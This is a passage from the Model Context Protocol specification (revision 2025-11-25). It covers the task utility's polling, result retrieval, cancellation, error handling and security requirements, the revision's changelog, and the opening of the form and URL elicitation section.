"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"pollInterval": 5000
}
}
```
### Retrieving Task Results
In the Streamable HTTP (SSE) transport, clients **MAY** disconnect from an SSE stream opened by the server in response to a `tasks/result` request at any time.
While this note is not prescriptive regarding the specific usage of SSE streams, all implementations **MUST** continue to comply with the existing [Streamable HTTP transport specification](../transports#sending-messages-to-the-server).
After a task completes the operation result is retrieved via [`tasks/result`](/specification/2025-11-25/schema#tasks%2Fresult). This is distinct from the initial `CreateTaskResult` response, which contains only task data. The result structure matches the original request type (e.g., `CallToolResult` for `tools/call`).
To retrieve the result of a completed task, requestors can send a `tasks/result` request:
While `tasks/result` blocks until the task reaches a terminal status, requestors can continue polling via `tasks/get` in parallel if they are not actively blocked waiting for the result, such as if their previous `tasks/result` request failed or was cancelled. This allows requestors to monitor status changes or display progress updates while the task executes, even after invoking `tasks/result`.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"method": "tasks/result",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"content": [
{
"type": "text",
"text": "Current weather in New York:\nTemperature: 72°F\nConditions: Partly cloudy"
}
],
"isError": false,
"_meta": {
"io.modelcontextprotocol/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
### Task Status Notification
When a task status changes, receivers **MAY** send a [`notifications/tasks/status`](/specification/2025-11-25/schema#notifications%2Ftasks%2Fstatus) notification to inform the requestor of the change. This notification includes the full task state.
**Notification:**
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tasks/status",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "completed",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:50:00Z",
"ttl": 60000,
"pollInterval": 5000
}
}
```
The notification includes the full [`Task`](/specification/2025-11-25/schema#task) object, including the updated `status` and `statusMessage` (if present). This allows requestors to access the complete task state without making an additional `tasks/get` request.
Requestors **MUST NOT** rely on receiving this notifications, as it is optional. Receivers are not required to send status notifications and may choose to only send them for certain status transitions. Requestors **SHOULD** continue to poll via `tasks/get` to ensure they receive status updates.
### Listing Tasks
To retrieve a list of tasks, requestors can send a [`tasks/list`](/specification/2025-11-25/schema#tasks%2Flist) request. This operation supports pagination.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"method": "tasks/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"result": {
"tasks": [
{
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "working",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"pollInterval": 5000
},
{
"taskId": "abc123-def456-ghi789",
"status": "completed",
"createdAt": "2025-11-25T09:15:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 60000
}
],
"nextCursor": "next-page-cursor"
}
}
```
### Cancelling Tasks
To explicitly cancel a task, requestors can send a [`tasks/cancel`](/specification/2025-11-25/schema#tasks%2Fcancel) request.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 6,
"method": "tasks/cancel",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 6,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "cancelled",
"statusMessage": "The task was cancelled by request.",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"pollInterval": 5000
}
}
```
## Behavior Requirements
These requirements apply to all parties that support receiving task-augmented requests.
### Task Support and Handling
1. Receivers that do not declare the task capability for a request type **MUST** process requests of that type normally, ignoring any task-augmentation metadata if present.
2. Receivers that declare the task capability for a request type **MAY** return an error for non-task-augmented requests, requiring requestors to use task augmentation.
### Task ID Requirements
1. Task IDs **MUST** be a string value.
2. Task IDs **MUST** be generated by the receiver when creating a task.
3. Task IDs **MUST** be unique among all tasks controlled by the receiver.
### Task Status Lifecycle
1. Tasks **MUST** begin in the `working` status when created.
2. Receivers **MUST** only transition tasks through the following valid paths:
1. From `working`: may move to `input_required`, `completed`, `failed`, or `cancelled`
2. From `input_required`: may move to `working`, `completed`, `failed`, or `cancelled`
3. Tasks with a `completed`, `failed`, or `cancelled` status are in a terminal state and **MUST NOT** transition to any other status
**Task Status State Diagram:**
```mermaid theme={null}
stateDiagram-v2
[*] --> working
working --> input_required
working --> terminal
input_required --> working
input_required --> terminal
terminal --> [*]
note right of terminal
Terminal states:
• completed
• failed
• cancelled
end note
```
### Input Required Status
With the Streamable HTTP (SSE) transport, servers often close SSE streams after delivering a response message, which can lead to ambiguity regarding the stream used for subsequent task messages.
Servers can handle this by enqueueing messages to the client to side-channel task-related messages alongside other responses.
Servers have flexibility in how they manage SSE streams during task polling and result retrieval, and clients **SHOULD** expect messages to be delivered on any SSE stream, including the HTTP GET stream.
One possible approach is maintaining an SSE stream on `tasks/result` (see notes on the `input_required` status).
Where possible, servers **SHOULD NOT** upgrade to an SSE stream in response to a `tasks/get` request, as the client has indicated it wishes to poll for a result.
While this note is not prescriptive regarding the specific usage of SSE streams, all implementations **MUST** continue to comply with the existing [Streamable HTTP transport specification](../transports#sending-messages-to-the-server).
1. When the task receiver has messages for the requestor that are necessary to complete the task, the receiver **SHOULD** move the task to the `input_required` status.
2. The receiver **MUST** include the `io.modelcontextprotocol/related-task` metadata in the request to associate it with the task.
3. When the requestor encounters the `input_required` status, it **SHOULD** preemptively call `tasks/result`.
4. When the receiver receives all required input, the task **SHOULD** transition out of `input_required` status (typically back to `working`).
### TTL and Resource Management
1. Receivers **MUST** include a `createdAt` [ISO 8601](https://datatracker.ietf.org/doc/html/rfc3339#section-5)-formatted timestamp in all task responses to indicate when the task was created.
2. Receivers **MUST** include a `lastUpdatedAt` [ISO 8601](https://datatracker.ietf.org/doc/html/rfc3339#section-5)-formatted timestamp in all task responses to indicate when the task was last updated.
3. Receivers **MAY** override the requested `ttl` duration.
4. Receivers **MUST** include the actual `ttl` duration (or `null` for unlimited) in `tasks/get` responses.
5. After a task's `ttl` lifetime has elapsed, receivers **MAY** delete the task and its results, regardless of the task status.
6. Receivers **MAY** include a `pollInterval` value (in milliseconds) in `tasks/get` responses to suggest polling intervals. Requestors **SHOULD** respect this value when provided.
### Result Retrieval
1. Receivers that accept a task-augmented request **MUST** return a `CreateTaskResult` as the response. This result **SHOULD** be returned as soon as possible after accepting the task.
2. When a receiver receives a `tasks/result` request for a task in a terminal status (`completed`, `failed`, or `cancelled`), it **MUST** return the final result of the underlying request, whether that is a successful result or a JSON-RPC error.
3. When a receiver receives a `tasks/result` request for a task in any other non-terminal status (`working` or `input_required`), it **MUST** block the response until the task reaches a terminal status.
4. For tasks in a terminal status, receivers **MUST** return from `tasks/result` exactly what the underlying request would have returned, whether that is a successful result or a JSON-RPC error.
### Associating Task-Related Messages
1. All requests, notifications, and responses related to a task **MUST** include the `io.modelcontextprotocol/related-task` key in their `_meta` field, with the value set to an object with a `taskId` matching the associated task ID.
1. For example, an elicitation that a task-augmented tool call depends on **MUST** share the same related task ID with that tool call's task.
2. For the `tasks/get`, `tasks/result`, and `tasks/cancel` operations, the `taskId` parameter in the request **MUST** be used as the source of truth for identifying the target task. Requestors **SHOULD NOT** include `io.modelcontextprotocol/related-task` metadata in these requests, and receivers **MUST** ignore such metadata if present in favor of the RPC method parameter.
Similarly, for the `tasks/get`, `tasks/list`, and `tasks/cancel` operations, receivers **SHOULD NOT** include `io.modelcontextprotocol/related-task` metadata in the result messages, as the `taskId` is already present in the response structure.
### Task Notifications
1. Receivers **MAY** send `notifications/tasks/status` notifications when a task's status changes.
2. Requestors **MUST NOT** rely on receiving the `notifications/tasks/status` notification, as it is optional.
3. When sent, the `notifications/tasks/status` notification **SHOULD NOT** include the `io.modelcontextprotocol/related-task` metadata, as the task ID is already present in the notification parameters.
### Task Progress Notifications
Task-augmented requests support progress notifications as defined in the [progress](./progress) specification. The `progressToken` provided in the initial request remains valid throughout the task lifetime.
### Task Listing
1. Receivers **SHOULD** use cursor-based pagination to limit the number of tasks returned in a single response.
2. Receivers **MUST** include a `nextCursor` in the response if more tasks are available.
3. Requestors **MUST** treat cursors as opaque tokens and not attempt to parse or modify them.
4. If a task is retrievable via `tasks/get` for a requestor, it **MUST** be retrievable via `tasks/list` for that requestor.
### Task Cancellation
1. Receivers **MUST** reject cancellation requests for tasks already in a terminal status (`completed`, `failed`, or `cancelled`) with error code `-32602` (Invalid params).
2. Upon receiving a valid cancellation request, receivers **SHOULD** attempt to stop the task execution and **MUST** transition the task to `cancelled` status before sending the response.
3. Once a task is cancelled, it **MUST** remain in `cancelled` status even if execution continues to completion or fails.
4. The `tasks/cancel` operation does not define deletion behavior. However, receivers **MAY** delete cancelled tasks at their discretion at any time, including immediately after cancellation or after the task `ttl` expires.
5. Requestors **SHOULD NOT** rely on cancelled tasks being retained for any specific duration and should retrieve any needed information before cancelling.
## Message Flow
### Basic Task Lifecycle
```mermaid theme={null}
sequenceDiagram
participant C as Client (Requestor)
participant S as Server (Receiver)
Note over C,S: 1. Task Creation
C->>S: Request with task field (ttl)
activate S
S->>C: CreateTaskResult (taskId, status: working, ttl, pollInterval)
deactivate S
Note over C,S: 2. Task Polling
C->>S: tasks/get (taskId)
activate S
S->>C: working
deactivate S
Note over S: Task processing continues...
C->>S: tasks/get (taskId)
activate S
S->>C: working
deactivate S
Note over S: Task completes
C->>S: tasks/get (taskId)
activate S
S->>C: completed
deactivate S
Note over C,S: 3. Result Retrieval
C->>S: tasks/result (taskId)
activate S
S->>C: Result content
deactivate S
Note over C,S: 4. Cleanup
Note over S: After ttl period from creation, task is cleaned up
```
### Task-Augmented Tool Call With Elicitation
```mermaid theme={null}
sequenceDiagram
participant U as User
participant LLM
participant C as Client (Requestor)
participant S as Server (Receiver)
Note over LLM,C: LLM initiates request
LLM->>C: Request operation
Note over C,S: Client augments with task
C->>S: tools/call (ttl: 3600000)
activate S
S->>C: CreateTaskResult (task-123, status: working)
deactivate S
Note over LLM,C: Client continues processing other requests while task executes in background
LLM->>C: Request other operation
C->>LLM: Other operation result
Note over C,S: Client polls for status
C->>S: tasks/get (task-123)
activate S
S->>C: working
deactivate S
Note over S: Server needs information from client Task moves to input_required
Note over C,S: Client polls and discovers input_required
C->>S: tasks/get (task-123)
activate S
S->>C: input_required
deactivate S
Note over C,S: Client opens result stream
C->>S: tasks/result (task-123)
activate S
S->>C: elicitation/create (related-task: task-123)
activate C
C->>U: Prompt user for input
U->>C: Provide information
C->>S: elicitation response (related-task: task-123)
deactivate C
deactivate S
Note over C,S: Client closes result stream and resumes polling
Note over S: Task continues processing... Task moves back to working
C->>S: tasks/get (task-123)
activate S
S->>C: working
deactivate S
Note over S: Task completes
Note over C,S: Client polls and discovers completion
C->>S: tasks/get (task-123)
activate S
S->>C: completed
deactivate S
Note over C,S: Client retrieves final results
C->>S: tasks/result (task-123)
activate S
S->>C: Result content
deactivate S
C->>LLM: Process result
Note over S: Results retained for ttl period from creation
```
### Task-Augmented Sampling Request
```mermaid theme={null}
sequenceDiagram
participant U as User
participant LLM
participant C as Client (Receiver)
participant S as Server (Requestor)
Note over S: Server decides to initiate request
Note over S,C: Server requests client operation (task-augmented)
S->>C: sampling/createMessage (ttl: 3600000)
activate C
C->>S: CreateTaskResult (request-789, status: working)
deactivate C
Note over S: Server continues processing while waiting for result
Note over S,C: Server polls for result
S->>C: tasks/get (request-789)
activate C
C->>S: working
deactivate C
Note over C,U: Client may present request to user
C->>U: Review request
U->>C: Approve request
Note over C,LLM: Client may involve LLM
C->>LLM: Request completion
LLM->>C: Return completion
Note over C,U: Client may present result to user
C->>U: Review result
U->>C: Approve result
Note over S,C: Server polls and discovers completion
S->>C: tasks/get (request-789)
activate C
C->>S: completed
deactivate C
Note over S,C: Server retrieves result
S->>C: tasks/result (request-789)
activate C
C->>S: Result content
deactivate C
Note over S: Server continues processing
Note over C: Results retained for ttl period from creation
```
### Task Cancellation Flow
```mermaid theme={null}
sequenceDiagram
participant C as Client (Requestor)
participant S as Server (Receiver)
Note over C,S: 1. Task Creation
C->>S: tools/call (request ID: 42, ttl: 60000)
activate S
S->>C: CreateTaskResult (task-123, status: working)
deactivate S
Note over C,S: 2. Task Processing
C->>S: tasks/get (task-123)
activate S
S->>C: working
deactivate S
Note over C,S: 3. Client Cancellation
Note over C: User requests cancellation
C->>S: tasks/cancel (taskId: task-123)
activate S
Note over S: Server stops execution (best effort)
Note over S: Task moves to cancelled status
S->>C: Task (status: cancelled)
deactivate S
Note over C: Client receives confirmation
Note over S: Server may delete task at its discretion
```
## Data Types
### Task
A task represents the execution state of a request. The task state includes:
* `taskId`: Unique identifier for the task
* `status`: Current state of the task execution
* `statusMessage`: Optional human-readable message describing the current state (can be present for any status, including error details for failed tasks)
* `createdAt`: ISO 8601 timestamp when the task was created
* `ttl`: Time in milliseconds from creation before task may be deleted
* `pollInterval`: Suggested time in milliseconds between status checks
* `lastUpdatedAt`: ISO 8601 timestamp when the task status was last updated
### Task Status
Tasks can be in one of the following states:
* `working`: The request is currently being processed.
* `input_required`: The receiver needs input from the requestor. The requestor should call `tasks/result` to receive input requests, even though the task has not reached a terminal state.
* `completed`: The request completed successfully and results are available.
* `failed`: The associated request did not complete successfully. For tool calls specifically, this includes cases where the tool call result has `isError` set to true.
* `cancelled`: The request was cancelled before completion.
### Task Parameters
When augmenting a request with task execution, the `task` field is included in the request parameters:
```json theme={null}
{
"task": {
"ttl": 60000
}
}
```
Fields:
* `ttl` (number, optional): Requested duration in milliseconds to retain task from creation
### Related Task Metadata
All requests, responses, and notifications associated with a task **MUST** include the `io.modelcontextprotocol/related-task` key in `_meta`:
```json theme={null}
{
"io.modelcontextprotocol/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
This associates messages with their originating task across the entire request lifecycle.
For the `tasks/get`, `tasks/list`, and `tasks/cancel` operations, requestors and receivers **SHOULD NOT** include this metadata in their messages, as the `taskId` is already present in the message structure.
The `tasks/result` operation **MUST** include this metadata in its response, as the result structure itself does not contain the task ID.
## Error Handling
Tasks use two error reporting mechanisms:
1. **Protocol Errors**: Standard JSON-RPC errors for protocol-level issues
2. **Task Execution Errors**: Errors in the underlying request execution, reported through task status
### Protocol Errors
Receivers **MUST** return standard JSON-RPC errors for the following protocol error cases:
* Invalid or nonexistent `taskId` in `tasks/get`, `tasks/result`, or `tasks/cancel`: `-32602` (Invalid params)
* Invalid or nonexistent cursor in `tasks/list`: `-32602` (Invalid params)
* Attempt to cancel a task already in a terminal status: `-32602` (Invalid params)
* Internal errors: `-32603` (Internal error)
Additionally, receivers **MAY** return the following errors:
* Non-task-augmented request when receiver requires task augmentation for that request type: `-32600` (Invalid request)
Receivers **SHOULD** provide informative error messages to describe the cause of errors.
**Example: Task augmentation required**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"error": {
"code": -32600,
"message": "Task augmentation required for tools/call requests"
}
}
```
**Example: Task not found**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 70,
"error": {
"code": -32602,
"message": "Failed to retrieve task: Task not found"
}
}
```
**Example: Task expired**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 71,
"error": {
"code": -32602,
"message": "Failed to retrieve task: Task has expired"
}
}
```
Receivers are not required to retain tasks indefinitely. It is compliant behavior for a receiver to return an error stating the task cannot be found if it has purged an expired task.
**Example: Task cancellation rejected (already terminal)**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 74,
"error": {
"code": -32602,
"message": "Cannot cancel task: already in terminal status 'completed'"
}
}
```
### Task Execution Errors
When the underlying request does not complete successfully, the task moves to the `failed` status. This includes JSON-RPC protocol errors during request execution, or for tool calls specifically, when the tool result has `isError` set to true. The `tasks/get` response **SHOULD** include a `statusMessage` field with diagnostic information about the failure.
**Example: Task with execution error**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f820fe840",
"status": "failed",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"statusMessage": "Tool execution failed: API rate limit exceeded"
}
}
```
For tasks that wrap tool call requests, when the tool result has `isError` set to `true`, the task should reach `failed` status.
The `tasks/result` endpoint returns exactly what the underlying request would have returned:
* If the underlying request resulted in a JSON-RPC error, `tasks/result` **MUST** return that same JSON-RPC error.
* If the request completed with a JSON-RPC response, `tasks/result` **MUST** return a successful JSON-RPC response containing that result.
## Security Considerations
### Task Isolation and Access Control
Task IDs are the primary mechanism for accessing task state and results. Without proper access controls, any party that can guess or obtain a task ID could potentially access sensitive information or manipulate tasks they did not create.
When an authorization context is provided, receivers **MUST** bind tasks to said context.
Context-binding is not practical for all applications. Some MCP servers operate in environments without authorization, such as single-user tools, or use transports that don't support authorization.
In these scenarios, receivers **SHOULD** document this limitation clearly, as task results may be accessible to any requestor that can guess the task ID.
If context-binding is unavailable, receivers **MUST** generate cryptographically secure task IDs with enough entropy to prevent guessing and should consider using shorter TTL durations to reduce the exposure window.
If context-binding is available, receivers **MUST** reject `tasks/get`, `tasks/result`, and `tasks/cancel` requests for tasks that do not belong to the same authorization context as the requestor. For `tasks/list` requests, receivers **MUST** ensure the returned task list includes only tasks associated with the requestor's authorization context.
Additionally, receivers **SHOULD** implement rate limiting on task operations to prevent denial-of-service and enumeration attacks.
### Resource Management
1. Receivers **SHOULD**:
1. Enforce limits on concurrent tasks per requestor
2. Enforce maximum `ttl` durations to prevent indefinite resource retention
3. Clean up expired tasks promptly to free resources
4. Document maximum supported `ttl` duration
5. Document maximum concurrent tasks per requestor
6. Implement monitoring and alerting for resource usage
### Audit and Logging
1. Receivers **SHOULD**:
1. Log task creation, completion, and retrieval events for audit purposes
2. Include auth context in logs when available
3. Monitor for suspicious patterns (e.g., many failed task lookups, excessive polling)
2. Requestors **SHOULD**:
1. Log task lifecycle events for debugging and audit purposes
2. Track task IDs and their associated operations
# Key Changes
Source: https://modelcontextprotocol.io/specification/2025-11-25/changelog
This document lists changes made to the Model Context Protocol (MCP) specification since
the previous revision, [2025-06-18](/specification/2025-06-18).
## Major changes
1. Enhance authorization server discovery with support for [OpenID Connect Discovery 1.0](https://openid.net/specs/openid-connect-discovery-1_0.html). (PR [#797](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/797))
2. Allow servers to expose icons as additional metadata for tools, resources, resource templates, and prompts ([SEP-973](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/973)).
3. Enhance authorization flows with incremental scope consent via `WWW-Authenticate` ([SEP-835](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/835))
4. Provide guidance on tool names ([SEP-986](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1603))
5. Update `ElicitResult` and `EnumSchema` to use a more standards-based approach and support titled, untitled, single-select, and multi-select enums ([SEP-1330](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1330)).
6. Added support for [URL mode elicitation](/specification/2025-11-25/client/elicitation#url-elicitation-requests) ([SEP-1036](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/887))
7. Add tool calling support to sampling via `tools` and `toolChoice` parameters ([SEP-1577](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1577))
8. Add support for OAuth Client ID Metadata Documents as a recommended client registration mechanism ([SEP-991](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/991), PR [#1296](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1296))
9. Add experimental support for [tasks](/specification/2025-11-25/basic/utilities/tasks) to enable tracking durable requests with polling and deferred result retrieval ([SEP-1686](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1686)).
## Minor changes
1. Clarify that servers using stdio transport may use stderr for all types of logging, not just error messages (PR [#670](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/670)).
2. Add optional `description` field to `Implementation` interface to align with MCP registry server.json format and provide human-readable context during initialization.
3. Clarify that servers must respond with HTTP 403 Forbidden for invalid Origin headers in Streamable HTTP transport. (PR [#1439](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1439))
4. Updated the [Security Best Practices guidance](https://modelcontextprotocol.io/specification/draft/basic/security_best_practices).
5. Clarify that input validation errors should be returned as Tool Execution Errors rather than Protocol Errors to enable model self-correction ([SEP-1303](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1303)).
6. Support polling SSE streams by allowing servers to disconnect at will ([SEP-1699](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1699)).
7. Clarify SEP-1699: GET streams support polling, resumption always via GET regardless of stream origin, event IDs should encode stream identity, disconnection includes server-initiated closure (Issue [#1847](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1847)).
8. Align OAuth 2.0 Protected Resource Metadata discovery with RFC 9728, making `WWW-Authenticate` header optional with fallback to `.well-known` endpoint ([SEP-985](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/985)).
9. Add support for default values in all primitive types (string, number, enum) for elicitation schemas ([SEP-1034](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1034)).
10. Establish JSON Schema 2020-12 as the default dialect for MCP schema definitions ([SEP-1613](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1613)).
## Other schema changes
1. Decouple request payloads from RPC method definitions into standalone parameter schemas. ([SEP-1319](https://github.com/modelcontextprotocol/specification/issues/1319), PR [#1284](https://github.com/modelcontextprotocol/specification/pull/1284))
## Governance and process updates
1. Formalize Model Context Protocol governance structure ([SEP-932](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/932)).
2. Establish shared communication practices and guidelines for the MCP community ([SEP-994](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/994)).
3. Formalize Working Groups and Interest Groups in MCP governance ([SEP-1302](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1302)).
4. Establish SDK tiering system with clear requirements for feature support and maintenance commitments ([SEP-1730](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1730)).
## Full changelog
For a complete list of all changes that have been made since the last protocol revision,
[see GitHub](https://github.com/modelcontextprotocol/specification/compare/2025-06-18...2025-11-25).
# Elicitation
Source: https://modelcontextprotocol.io/specification/2025-11-25/client/elicitation
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to request additional
information from users through the client during interactions. This flow allows clients to
maintain control over user interactions and data sharing while enabling servers to gather
necessary information dynamically.
Elicitation supports two modes:
* **Form mode**: Servers can request structured data from users with optional JSON schemas to validate responses
* **URL mode**: Servers can direct users to external URLs for sensitive interactions that must *not* pass through the MCP client
## User Interaction Model
Elicitation in MCP allows servers to implement interactive workflows by enabling user input
requests to occur *nested* inside other MCP server features.
Implementations are free to expose elicitation through any interface pattern that suits
their needs—the protocol itself does not mandate any specific user interaction
model.
For trust & safety and security:
* Servers **MUST NOT** use form mode elicitation to request sensitive information
* Servers **MUST** use URL mode for interactions involving sensitive information, such as credentials
MCP clients **MUST**:
* Provide UI that makes it clear which server is requesting information
* Respect user privacy and provide clear decline and cancel options
* For form mode, allow users to review and modify their responses before sending
* For URL mode, clearly display the target domain/host and gather user consent before navigation to the target URL
## Capabilities
Clients that support elicitation **MUST** declare the `elicitation` capability during
[initialization](../basic/lifecycle#initialization):
```json theme={null}
{
"capabilities": {
"elicitation": {
"form": {},
"url": {}
}
}
}
```
For backwards compatibility, an empty capabilities object is equivalent to declaring support for `form` mode only:
```jsonc theme={null}
{
"capabilities": {
"elicitation": {}, // Equivalent to { "form": {} }
},
}
```
Clients declaring the `elicitation` capability **MUST** support at least one mode (`form` or `url`).
Servers **MUST NOT** send elicitation requests with modes that are not supported by the client.
## Protocol Messages
### Elicitation Requests
To request information from a user, servers send an `elicitation/create` request.
All elicitation requests **MUST** include the following parameters:
| Name | Type | Options | Description |
| --------- | ------ | ------------- | -------------------------------------------------------------------------------------- |
| `mode` | string | `form`, `url` | The mode of the elicitation. Optional for form mode (defaults to `"form"` if omitted). |
| `message` | string | | A human-readable message explaining why the interaction is needed. |
The `mode` parameter specifies the type of elicitation:
* `"form"`: In-band structured data collection with optional schema validation. Data is exposed to the client.
* `"url"`: Out-of-band interaction via URL navigation. Data (other than the URL itself) is **not** exposed to the client.
For backwards compatibility, servers **MAY** omit the `mode` field for form mode elicitation requests. Clients **MUST** treat requests without a `mode` field as form mode.
### Form Mode Elicitation Requests
Form mode elicitation allows servers to collect structured data directly through the MCP client.
Form mode elicitation requests **MUST** either specify `mode: "form"` or omit the `mode` field, and include these additional parameters:
| Name | Type | Description |
| ----------------- | ------ | -------------------------------------------------------------- |
| `requestedSchema` | object | A JSON Schema defining the structure of the expected response. |
#### Requested Schema
The `requestedSchema` parameter allows servers to define the structure of the expected
response using a restricted subset of JSON Schema.
To simplify client user experience, form mode elicitation schemas are limited to flat objects
with primitive properties only.
The schema is restricted to these primitive types:
1. **String Schema**
```json theme={null}
{
"type": "string",
"title": "Display Name",
"description": "Description text",
"minLength": 3,
"maxLength": 50,
"pattern": "^[A-Za-z]+$",
"format": "email",
"default": "user@example.com"
}
```
Supported formats: `email`, `uri`, `date`, `date-time`
2. **Number Schema**
```json theme={null}
{
"type": "number", // or "integer"
"title": "Display Name",
"description": "Description text",
"minimum": 0,
"maximum": 100,
"default": 50
}
```
3. **Boolean Schema**
```json theme={null}
{
"type": "boolean",
"title": "Display Name",
"description": "Description text",
"default": false
}
```
4. **Enum Schema**
Single-select enum (without titles):
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"enum": ["Red", "Green", "Blue"],
"default": "Red"
}
```
Single-select enum (with titles):
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"oneOf": [
{ "const": "#FF0000", "title": "Red" },
{ "const": "#00FF00", "title": "Green" },
{ "const": "#0000FF", "title": "Blue" }
],
"default": "#FF0000"
}
```
Multi-select enum (without titles):
```json theme={null}
{
"type": "array",
"title": "Color Selection",
"description": "Choose your favorite colors",
"minItems": 1,
"maxItems": 2,
"items": {
"type": "string",
"enum": ["Red", "Green", "Blue"]
},
"default": ["Red", "Green"]
}
```
Multi-select enum (with titles):
```json theme={null}
{
"type": "array",
"title": "Color Selection",
"description": "Choose your favorite colors",
"minItems": 1,
"maxItems": 2,
"items": {
"anyOf": [
{ "const": "#FF0000", "title": "Red" },
{ "const": "#00FF00", "title": "Green" },
{ "const": "#0000FF", "title": "Blue" }
]
},
"default": ["#FF0000", "#00FF00"]
}
```
Clients can use this schema to:
1. Generate appropriate input forms
2. Validate user input before sending
3. Provide better guidance to users
All primitive types support optional default values to provide sensible starting points. Clients that support defaults SHOULD pre-populate form fields with these values.
Note that complex nested structures, arrays of objects (beyond enums), and other advanced JSON Schema features are intentionally not supported to simplify client user experience.
#### Example: Simple Text Request
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "elicitation/create",
"params": {
"mode": "form",
"message": "Please provide your GitHub username",
"requestedSchema": {
"type": "object",
"properties": {
"name": {
"type": "string"
}
},
"required": ["name"]
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"action": "accept",
"content": {
"name": "octocat"
}
}
}
```
#### Example: Structured Data Request
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "elicitation/create",
"params": {
"mode": "form",
"message": "Please provide your contact information",
"requestedSchema": {
"type": "object",
"properties": {
"name": {
"type": "string",
"description": "Your full name"
},
"email": {
"type": "string",
"format": "email",
"description": "Your email address"
},
"age": {
"type": "number",
"minimum": 18,
"description": "Your age"
}
},
"required": ["name", "email"]
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"action": "accept",
"content": {
"name": "Monalisa Octocat",
"email": "octocat@github.com",
"age": 30
}
}
}
```
### URL Mode Elicitation Requests
**New feature:** URL mode elicitation is introduced in the `2025-11-25` version of the MCP specification. Its design and implementation may change in future protocol revisions.
URL mode elicitation enables servers to direct users to external URLs for out-of-band interactions that must not pass through the MCP client. This is essential for auth flows, payment processing, and other sensitive or secure operations.
URL mode elicitation requests **MUST** specify `mode: "url"`, a `message`, and include these additional parameters:
| Name | Type | Description |
| --------------- | ------ | ----------------------------------------- |
| `url` | string | The URL that the user should navigate to. |
| `elicitationId` | string | A unique identifier for the elicitation. |
The `url` parameter **MUST** contain a valid URL.
**Important**: URL mode elicitation is *not* for authorizing the MCP client's
access to the MCP server (that's handled by [MCP
authorization](../basic/authorization)). Instead, it's used when the MCP
server needs to obtain sensitive information or third-party authorization on
behalf of the user. The MCP client's bearer token remains unchanged. The
client's only responsibility is to provide the user with context about the
elicitation URL the server wants them to open.
#### Example: Request Sensitive Data
This example shows a URL mode elicitation request directing the user to a secure URL where they can provide sensitive information (an API key, for example).
The same request could direct the user into an OAuth authorization flow, or a payment flow. The only difference is the URL and the message.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "elicitation/create",
"params": {
"mode": "url",
"elicitationId": "550e8400-e29b-41d4-a716-446655440000",
"url": "https://mcp.example.com/ui/set_api_key",
"message": "Please provide your API key to continue."
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"action": "accept"
}
}
```
The response with `action: "accept"` indicates that the user has consented to the
interaction. It does not mean that the interaction is complete. The interaction occurs out
